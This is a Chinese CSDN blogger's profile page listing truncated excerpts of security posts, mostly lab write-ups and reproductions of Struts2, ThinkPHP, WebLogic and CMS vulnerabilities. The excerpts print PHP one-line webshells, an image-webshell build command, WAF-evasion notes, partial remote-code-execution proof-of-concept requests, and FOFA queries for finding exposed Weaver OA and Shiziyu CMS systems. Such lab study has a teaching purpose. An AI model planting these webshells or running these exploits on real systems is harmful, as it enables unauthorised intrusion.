wwxxee
码龄6年
关注
提问 私信
  • 博客:102,034
    动态:13
    102,047
    总访问量
  • 112
    原创
  • 453,106
    排名
  • 108
    粉丝

个人简介:become better

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:上海市
  • 加入CSDN时间: 2018-07-07
博客简介:

wwxxee

博客描述:
Go
查看详细资料
个人成就
  • 获得160次点赞
  • 内容获得85次评论
  • 获得402次收藏
  • 代码片获得609次分享
创作历程
  • 53篇
    2021年
  • 50篇
    2020年
  • 9篇
    2019年
成就勋章
TA的专栏
  • 网络安全笔记
    45篇
  • 漏洞复现
    5篇
  • zkaq靶场
    25篇
  • 漏洞挖掘
    2篇
  • DVWA
    9篇
  • Kali
    7篇
  • CCNP笔记
    5篇
  • 环境配置及报错
    1篇
  • 网络
    2篇
  • 其他
    1篇
  • 爬虫
    8篇
兴趣领域 设置
  • 操作系统
    windows
  • 网络空间安全
    网络安全安全系统安全web安全安全架构网络攻击模型ddos安全威胁分析
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

[漏洞复现]Struts2-057远程命令执行

Struts2-057远程代码执行漏洞复现影响版本:<= Struts 2.3.34Struts 2.5.16简述:定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。a1waysSelectFul1Namespace为true—action元素没有设置namesp
原创
发布博客 2021.05.22 ·
613 阅读 ·
1 点赞 ·
0 评论 ·
1 收藏

[漏洞复现]Struts2-016命令执行漏洞复现

Struts2-016命令执行漏洞Struts2有很多漏洞,但是很多老系统都漏补了这个洞,成功率较高。影响版本:2.0.0 - 2.3.15简述Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令。redirect:和redirectAction:此两项前缀为Struts默认开启功能。在s
原创
发布博客 2021.05.20 ·
3871 阅读 ·
3 点赞 ·
5 评论 ·
2 收藏

[漏洞复现]ThinkPHP 5.0.x 未开启强制路由导致的RCE

ThinkPHP 5.0.x 未开启强制路由导致的RCE影响版本:ThinkPHP 5.0.5-5.0.22ThinkPHP 5.1.0-5.1.30环境:vulhub-master/thinkphp/5-rce启动docker环境之后访问:这个的版本是ThinkPHP 5.0.20版本:http://ip:8080/POC:http://192.168.17.134:8080/index.php?s=/Index/\think\app/invokefunction&func
原创
发布博客 2021.05.20 ·
785 阅读 ·
1 点赞 ·
3 评论 ·
0 收藏

[漏洞复现]Weblogic SSRF漏洞复现

Weblogic SSRF漏洞复现环境:vulhub/weblogic/ssrf漏洞点http://192.168.17.134:7001/uddiexplorer/SearchPublicRegistries.jsp通过抓包发现:将此处替换为其他的地址可以有不同的回显。例如:http://127.0.0.1:7001回显:weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://1
原创
发布博客 2021.05.20 ·
673 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

[漏洞复现]ThinkPHP5 核心类 Request 远程代码执行

ThinkPHP 5.x 核心类 Request 远程代码执行漏洞复现影响版本:ThinkPHP 5.0.x ~ 5.0.23ThinkPHP 5.1.x ~ 5.1.31ThinkPHP 5.2.0beta1环境:vulhub-master/thinkphp/5.0.23-rce启动docker环境之后,访问:http://ip:8080/POC:POST /index.php?s=captcha HTTP/1.1Host: 192.168.17.134:8080User-Age
原创
发布博客 2021.05.20 ·
558 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

[漏洞挖掘]SRC-狮子鱼CMS-SQL注入

狮子鱼cms-SQL注入狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞FOFA语法:“/seller.php?s=/Public/login”后台登录界面漏洞点:ApiController.class.phppublic function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url /
原创
发布博客 2021.05.20 ·
7690 阅读 ·
5 点赞 ·
5 评论 ·
23 收藏

[漏洞挖掘]SRC-泛微OA文件上传

SRC–泛微OA任意文件上传泛微OA weaver.common.Ctrl 任意文件上传漏洞存在漏洞的路径为:/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp首页:请求包:FOFA: app=“泛微-协同办公OA” && is_domain=true普通注册会员只能获取5页信息。有FOFA会员可以直接通过API请求拿到I
原创
发布博客 2021.05.19 ·
4189 阅读 ·
2 点赞 ·
2 评论 ·
17 收藏

WAF绕过--小马绕过

WAF绕过之小马免杀WAF:安全狗-Apache版 v4正常的PHP一句话木马:<?php eval($_REQUEST[6]);?>对于这个正常的一句话木马,安全狗会拦截。关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配]我们尝试只写<?php eval();?> 发现没有拦截,但是加了REQUEST[6]就拦截了那么我们是不是可以尝试测试看看究竟拦截_REQUEST[6]就拦截了 那么我们是不是可以尝试测试看看究竟拦截R​EQUES
原创
发布博客 2021.05.17 ·
878 阅读 ·
1 点赞 ·
9 评论 ·
7 收藏

[zkaq靶场]变量覆盖--duomi cms通杀漏洞

变量覆盖变量覆盖:值我们可以用我们的传参值去替换程序原有的变量值。经常导致变量覆盖漏洞场景有:$$使用不当;extract()函数使用不当;parse_str()函数使用不当;import_request_variables()使用不当,开启了全局变量注册等。$$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的值作为变量的值。因此就产生了变量覆盖漏洞。例如:<?php
原创
发布博客 2021.05.12 ·
1058 阅读 ·
2 点赞 ·
6 评论 ·
0 收藏

[zkaq靶场]命令执行--IBOS协同办公系统通杀漏洞

命令执行命令执行相关函数system()能够将字符串作为OS命令执行,自带输出功能。exec()将字符串作为OS命令执行,需要输出shell_exec()将字符串作为OS命令执行,需要输出passthru()能够将字符串作为OS命令执行,自带输出popen()将字符串作为OS命令执行,但是该函数返回一个文件指针。反引号``反引号内的字符串也会被解析成OS命令。靶场本地测试本期主角:ibos(一款协同办公系统)版本:4.5.5安装:安装完成之后
原创
发布博客 2021.05.11 ·
1940 阅读 ·
3 点赞 ·
2 评论 ·
5 收藏

[zkaq靶场]代码执行--DouPHP-v1.5漏洞

代码执行相关函数与语句eval():会将字符串当作代码来执行。<?php @eval($_REQUEST["code"])?>单双引号输出问题:assert():如果传入字符串会被当做PHP代码来执行<?php @assert($_REQUEST["code"])?>与eval的区别:eval可以执行多行,而assert只能执行一行。当assert想要执行多行时,可以利用写文件的方式:file_put_contents("123.php","<?php
原创
发布博客 2021.05.10 ·
1060 阅读 ·
3 点赞 ·
5 评论 ·
1 收藏

[zkaq靶场]文件包含--(phpMyAdmin-4.8.1 )

文件包含本地文件包含:LFI远程文件包含:RFI(需要开启配置选项:allow_url_include=On)靶场(phpMyAdmin-4.8.1 )本地测试审计全局搜索include,发现一些可疑之处:具体代码是这一块:需要执行到include需要满足这个if条件。我们可以来分析一下这个条件:(! empty($_REQUEST['target'])//条件1 is_string($_REQUEST['target'])//条件2 ! preg_match('/^index/
原创
发布博客 2021.05.10 ·
338 阅读 ·
1 点赞 ·
2 评论 ·
0 收藏

[zkaq靶场]XXE(XML外部实体注入)

XXE(XML外部实体注入)XML描述XML 被设计用来传输和存储数据,其焦点是数据的内容。XML标签没有被预定义,XML具有自我描述性。示例:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!E
原创
发布博客 2021.05.10 ·
701 阅读 ·
1 点赞 ·
3 评论 ·
1 收藏

[zkaq靶场]逻辑漏洞--支付漏洞

逻辑漏洞–支付漏洞案例:修改支付价格:https://www.uedbox.com/post/22477/修改支付状态:https://www.uedbox.com/post/24090/修改优惠券积分:http://woo.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0156253修改订单数量:https://www.uedbox.com/post/23143/越权支付:买自己的东西,扣别人的钱防御方法:后端检查每一项值,包括支付状态。
原创
发布博客 2021.05.10 ·
1487 阅读 ·
2 点赞 ·
3 评论 ·
8 收藏

[zkaq靶场]逻辑漏洞--越权

逻辑漏洞–越权参考案例:通过修改GET传参来越权:(https://www.uedbox.com/post/9900/)通过修改POST传参来越权:(https://www.uedbox.com/post/9549/)通过修改cookie传参进行越权(https://www.uedbox.com/post/12566/)未授权访问:https://www.uedbox.com/post/12151/靶场首页:点击注册之后我们随便注册一个用户:当前是普通用户,并且报修内容
原创
发布博客 2021.05.09 ·
988 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

[zkaq靶场]逻辑漏洞--验证码绕过(UsualToolCMS)

逻辑漏洞–验证码绕过、密码找回漏洞验证码绕过的常用姿势:一、前端验证验证码,并没有后端验证。直接抓包然后进行跑数据包,反正有没有验证码的阻碍二、验证码设置了但是并没有效验,乱输验证码也能够成功的登录三、验证码可以重复使用,比如现在的验证码1111,然后虽然你登录失败后验证码会变,但是你输入1111他却判定你验证码正确(常见)https://www.uedbox.com/post/14207/四、.验证码空值绕过,比如,我们现在抓一个包,发现登录参数是user=admin&password=
原创
发布博客 2021.05.09 ·
2862 阅读 ·
3 点赞 ·
3 评论 ·
8 收藏

[zkaq靶场]文件上传

文件上传靶场准备工作一个php一句话木马:oneword.php<?php @eval($_REQUEST[6]);?>一个图片马copy cat.jpg/b + oneword.php new_cat.jpg正常图片:cat.jpg图片马:new_cat.jpg第一关前端验证绕过,形同虚设,通过抓包修改即可。上传oneword.jpg,通过bp抓包修改为oneword.php将filename修改为oneword.php,即可成功上传。复制图片地址,打开菜刀。
原创
发布博客 2021.05.09 ·
323 阅读 ·
2 点赞 ·
3 评论 ·
3 收藏

[zkaq靶场]CSRF--dedecms跨站请求伪造

CSRF靶场环境首页:本地测试dedecms。在本地搭建dedecms测试环境。后台提供的新建文件功能。第一步、测试新建文件功能:点击新建文件:在此处新建一个一句话木马。可以新建php文件。第二步、生成CSRF Poc这次我们新建一个2.php文件,文件内容依然是与上面一样的一句话木马。然后抓包该请求。将该请求生成CSRF Poc。保存成2.html。然后在同一个浏览器的新标签页下打开2.html点击submit。2.php文件新建成功。这时,我们就可以认
原创
发布博客 2021.05.09 ·
884 阅读 ·
1 点赞 ·
1 评论 ·
5 收藏

[zkaq靶场]FineCMS的存储型XSS

Fine CMS 存储型xss漏洞本地测试安装(版本v5.3.0)tip:这个cms需要安装在网站根目录,不能安装在子目录然后访问install.php开始安装。完成安装,访问后台。默认账户密码:admin/admin。网站后台:提供错误日志查看功能。在错误日志页面,我们可以看到错误日志的存放位置:WWW/cache/errorlog/log-2021-03-26.php我们可以查看一下这个文件,然后输入一些内容测试一下。在该文件的最后一行加入了测试内容可以发现,后台的错误日志
原创
发布博客 2021.05.09 ·
1824 阅读 ·
3 点赞 ·
0 评论 ·
7 收藏

[zkaq靶场]XSS--DOM型XSS

DOM型xss知识点DOM(document object model)文档对象模型一个网页是由dom树构建而成,而js可以修改页面元素,也就是可以修改dom树中的节点。客户端可以通过js动态修改页面内容从而进行xss攻击。dom型xss常见函数:document.write():写入网页内容(可以接受native编码)innerHTML:修改节点内容eval:将字符串当作代码执行靶场首页:是一个聊天室查看页面代码发现此处使用了document.write()。而页面的url跟文本
原创
发布博客 2021.05.09 ·
533 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏
加载更多